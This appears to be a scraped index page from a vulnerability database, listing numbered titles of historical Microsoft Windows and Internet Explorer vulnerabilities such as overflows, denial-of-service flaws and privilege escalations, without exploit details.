Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [7117] Microsoft Windows RPC Locator Remote Overflow [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2670] Microsoft Windows RPC Race Condition DoS [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft Windows NT GINA Arbitrary Clipboard Content Disclosure [868] Microsoft Windows Compressed Folders ZIP Decompression Arbitrary File Write [867] Microsoft Windows Compiled HTML Help (.chm) Arbitrary Command Execution [864] Microsoft Windows Certificate Enrollment ActiveX Arbitrary Certificate Deletion [858] Microsoft Windows NCM Handler Local Privilege Elevation [837] Microsoft Windows RAS Phonebook dial-up String Overflow [788] Microsoft Windows smss.exe Handle Duplication Local Privilege Escalation [773] Microsoft Windows 2000 Group Policy File Lock DoS [772] Microsoft Windows Multiple UNC Provider Request Overflow [736] Microsoft Windows SMB Enumeration Information Disclosure [732] Microsoft Windows SMTP Service Malformed BDAT Request Remote DoS [715] Microsoft Windows NT LsaQueryInformationPolicy Function NULL Session Domain SID Enumeration [714] Microsoft Windows NT LsaQueryInformationPolicy() Function SID User Account Disclosure [697] Microsoft Windows Universal Plug and Play NOTIFY DoS [692] Microsoft Windows Universal Plug and Play NOTIFY Overflow [673] Microsoft Windows NT RPC Endpoint Mapper Malformed Request DoS [665] Microsoft Windows 95 Online Registration Information Disclosure [608] Microsoft Windows IrDa Driver Malformed Packet Remote Overflow DoS [581] Microsoft Windows SMTP Incorrect Credentials Authentication Bypass [572] Microsoft Windows NT NTLMSSP Crafted LPC Request Local Privilege Escalation [515] Microsoft Windows 2000 LDAP Server Arbitrary User Password Modification [511] Microsoft Windows Malformed PPTP Packet Stream Remote DoS [499] Microsoft Windows NT Winsock2ProtocolCatalogMutex Mutex Local DoS [466] Microsoft Windows NT RAS Administration Registry Key Permission Weakness Local Privilege Escalation [454] Microsoft Windows 2000 NTLM Domain Account Lockout Policy Bypass [445] Microsoft Windows LAN Manager SNMP LanMan Information Disclosure [424] Microsoft Windows NT Malformed LPC Request Remote DoS [423] Microsoft Windows File Share Password Protection Bypass [418] Microsoft Windows telnet.exe NTLM Authentication Information Disclosure [408] Microsoft Windows Malformed DCE/RPC SMBwriteX Request DoS [403] Microsoft Windows 2000 Still Image Service WM_USER Message Local Overflow [398] Microsoft Windows 2000 Malformed RPC Traffic Local Security Policy Corruption DoS [385] Microsoft Windows Shell Executable (Explorer.exe) Registry Relative Path Privilege Escalation [336] Microsoft Windows CIFS Computer Browser ResetBrowser Frame DoS [335] Microsoft Windows Fragmented IP Packet Saturation DoS (jolt2) [334] Microsoft Windows Registry: Permission to Modify Common Paths [332] Microsoft Windows Registry Key Permission Weakness Admin Privilege Escalation [331] Microsoft Windows Remote Registry Access [316] Microsoft Windows NT Remote Registry Server WinLogon.exe Malformed Request Local DoS [304] Microsoft Windows NT service pack level via remote registry access [303] Microsoft Windows NetBIOS Null Session Remote Registry Access [300] Microsoft Windows SMB LanMan Pipe Server Listing Disclosure [299] Microsoft Windows NetBIOS Shares Access Control Weakness [297] Microsoft Windows Installation ADMIN$ Share Arbitrary Access [218] Microsoft Windows Multiple TCP/IP Stack Malformed Ping DoS [129] Microsoft Windows NT FTP 'guest' Account [96192] Microsoft IE EUC-JP Character Encoding XSS [96191] Microsoft IE Process Integrity Level Assignment Bypass [96190] Microsoft IE Unspecified Memory Corruption (2013-3199) [96189] Microsoft IE Unspecified Memory Corruption (2013-3194) [96188] Microsoft IE Unspecified Memory 